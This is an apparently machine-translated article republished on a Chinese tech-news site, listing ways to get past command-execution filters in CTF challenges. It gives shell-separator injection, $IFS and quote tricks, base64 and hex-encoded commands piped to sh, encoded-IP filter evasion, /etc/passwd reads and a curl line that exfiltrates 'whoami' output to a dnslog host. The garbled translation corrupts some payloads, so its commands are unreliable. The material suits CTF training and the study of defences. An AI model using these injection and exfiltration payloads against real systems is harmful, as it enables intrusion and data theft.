In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-01 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
Editor to share with you what the CTF command implementation bypass ways, I believe that most people do not know much, so share this article for your reference, I hope you will learn a lot after reading this article, let's go to know it!
For reference, study and use only
0x01: pipe symbol
When using the linux command, we can execute multiple commands per line or conditionally execute the next command. Let's explain the use of the semicolon & & and &, | and | | of the linux command.
Semicolon usage
Method: command1; command2
Separate each command with the; sign, and each command is executed in the order from left to right, regardless of whether it fails or not, all commands are executed.
"|" pipe symbol usage
The output of the previous command as the argument to the next command. Inside ctf: ping 127.0.0.1 | ls (only execute ls, not the previous one)
Method: command1 | command
The pipe character "|" provided by Linux separates the two commands, and the output of the command on the left side of the pipe character is used as the input of the command on the right side of the pipe character. Continuous use of pipes means that the output of the first command is used as the input of the second command, the output of the second command is used as the input of the third command, and so on.
Take advantage of a pipe:
# rpm-qa | grep licq
This command creates a pipe with a pipe character "|". The pipeline lists RPM packages with licq characters by taking the output of the rpm-qa command (including all installed RPM packages in the system) as input to the grep command.
Take advantage of multiple pipes:
# cat / etc/passwd | grep / bin/bash | wc-l
This command uses two pipes, using the first pipe to send the output of the cat command (showing the contents of the passwd file) to the grep command, the grep command to find out all the lines containing "/ bin / bash"; the second pipe sends the output of grep to the wc command, and the wc command counts the number of lines in the input. The function of this command is to find out how many users in the system are using bash.
The usage of "&" symbol
Usage ping 127.0.0.1 & ls in ctf (execute ls first and then ping)
& put it after the startup parameter to set this process as a background process
Method: command1 &
By default, the process is the foreground process, so the Shell is occupied, and we cannot do other operations. For those processes that do not interact, we often want to start them in the background. We can add a'&'to the startup parameters to achieve this purpose.
The usage of "&" symbol
Usage ping 127.0.0.1 & & ls in ctf (execute ls only if the ping command is correct. If ping 1 & & ls ls will not execute)
When shell executes a command, it returns a return value, which is saved in the shell variable $? Medium. When $? = = 0, the execution is successful; when $? = = 1 (I think it is a non-zero number, the return value is between 0 and 255), the execution failed.
Sometimes the next command depends on whether the previous command was executed successfully. For example, execute another command after the successful execution of one command, or execute another command after the execution of another command fails. Shell provides & & and | | to control the execution of commands. Shell will control the execution of subsequent commands based on the return value of the previous command.
The syntax format is as follows:
Command1 & & command2 [& & command3.]
The & & connection is used between commands to realize the function of logic and.
Only if the command on the left of & & returns true (the command return value $? = = 0), the command on the right of & & will be executed.
As long as a command returns false (the command returns a value of $? = = 1), the subsequent command will not be executed.
"| |" symbol usage
And & & on the contrary, the left side is false to execute order two.
The function of logical OR
The syntax format is as follows:
Command1 | | command2 [| | command3.]
Use "|" to connect between commands to achieve the function of logic or.
Only if the command on the left returns false (the return value of the command $? = = 1), the command on the right will be executed. This is the same as the logic or syntax function in c language, that is, to implement short-circuit logic or operation.
As long as a command returns true (the command returns a value of $? = = 0), the subsequent command will not be executed. -stop execution until you return to the real place.
For example, the ping command determines the surviving host
Ping-c 1-w 1 192.168.1.1 & > / dev/null & & result=0 | | result=1 if ["$result" = = 0]; then echo "192.168.1.1 is UP!" Else echo "192.168.2.1 is DOWN!" Fi
Note that & > write together.
0x02: some bypass ways to bypass spaces under linux
{cat,flag.txt} cat$ {IFS} flag.txtcat$IFS$9flag.txtcat key.php
Inline implementation practices:
Payload:cat$IFS$ 1`ls`
Using inline execution will take the output in ``as the input of the previous command, and when we enter the above payload, it is equivalent to cat falg.php;cat index.php
Use DNS pipeline to resolve:
Here is an online URL that can be directly assigned to an exploiting URL: admin.dnslog.link registers an account and assigns a subdomain name that can be used.
| | curl `whoami`.http://xxxx.xxx( subdomain name) |
In this way, you will see the rebound result in the use of the URL. (there is no demonstration here, the account number has been forgotten. ) explain\ whoami\ because `backquotes are special symbols for executing commands under linux. For more information, please see:
Http://mp.weixin.qq.com/s/jwqWnP0FHhMoR5b6iCS6NQ
Convert a network address to a numeric address
There is another representation of a network address, which is that a numeric address such as 127.0.0.1 can be converted to 2130706433.
Can be accessed directly
Http://2130706433
Or http://0x7F000001.
So we can get around it. For ip filtering, here is a conversion URL:
Http://www.msxindl.com/tools/ip/ip_num.asp
Give permissions by viewing the permissions of the file chmod + 777
Lumped s'- la
C'h'm'o'd + 777 / filename
Command in place of cat
Cat: displays the content from the first line and outputs all the content
Tac: displays the content in reverse order from the last line and outputs all the content
More: the actual file content of one page according to the size of the window
Less: similar to more, but with the advantage of turning the page forward and searching for characters
Head: only the first few lines are displayed
Tail: show only the last few lines
Nl: similar to cat-n, output line number when displayed
Tailf: similar to tail-f
Sort%20/flag reads the file
Dir to view the current directory file
Linux fancy reading file content
Ps: the goal is to get the content of flag.txt
Static-sh reads the file:
Static-sh. / flag.txt
# output result:
. / flag.txt: line 1: flag {this_is_a_test}: not found
Paste reads the file:
Paste. / flag.txt / etc/passwd
# output result:
Flag {this_is_a_test}
Root:x:0:0:root:/root:/bin/bash
Daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
Bin:x:2:2:bin:/bin:/usr/sbin/nologin
Sys:x:3:3:sys:/dev:/usr/sbin/nologin
Sync:x:4:65534:sync:/bin:/bin/sync
Diff reads the file:
Diff. / flag.txt / etc/passwd
# output result:
1c1,45
< flag{this_is_a_test}\ No newline at end of file--->Root:x:0:0:root:/root:/bin/bash > daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin > bin:x:2:2:bin:/bin:/usr/sbin/nologin > sys:x:3:3:sys:/dev:/usr/sbin/nologin > sync:x:4:65534:sync:/bin:/bin/sync
Od reads files
Od-a. / flag.txt
# output result:
0000000 f l a g {t h i s _ i s _ a _ t0000020 e s t} 0000024
Bzmore reads the file:
Bzmore. / flag.txt
Bzless reads the file:
Bzless. / flag.txtecho `bzless. / room.txt`
# output result:
->. / flag.txt key.txt
Wget operation for target reading
Wget url-P path
Some command delimiters
In linux:% 0a,% 0d,;, &, |, & &, | |
In windows:% 0a, &, |, (a magical role as a command delimiter in a .bat file)
Filter the bash and use sh.
Echo$IFS$1Y2F0IGZsYWcucGhw | base64 $IFS$1-d | sh
Splice flag 1 * a * ag.php * cat $axib.
There is such a filtering method, which we cannot bypass with the above method, but we only need to change the order: 1 IFS$1 payload ("/. * f.*l.*a.*g.*/", $ip) {die ("fxck your flag!")) {die ("fxck your flag!");
Coding bypass
Base64:
Echo YWJjZGU= | base64-d / / print out abcde
Echo Y2F0IGZhbGcucGhw | base64-d | bash / / cat flag.php
Echo Y2F0IGZhbGcucGhw | base64-d | sh / / cat flag.php
Hex coding bypass:
Echo 63617420666c61672e706870 | xxd-r-p | bash / / cat flag.ph
Unicode coding
$(printf "\ 154163") / / ls
$(printf "\ x63\ x61\ x74\ x20\ x66\ x6c\ x61\ x67\ x2e\ x70\ x68\ x70") / / cat flag.php
Keywords can also be bypassed with single quotes and backslashes, such as cat fl''ag cat fl\ ag
To sum up, payload1;a=ag.php;b=fl;cat$IFS$1$ bachela and cat$IFS$ 1`ls`
Get the flag to view the source code.
The above is all the contents of this article entitled "what are the ways to bypass command execution in CTF?" Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.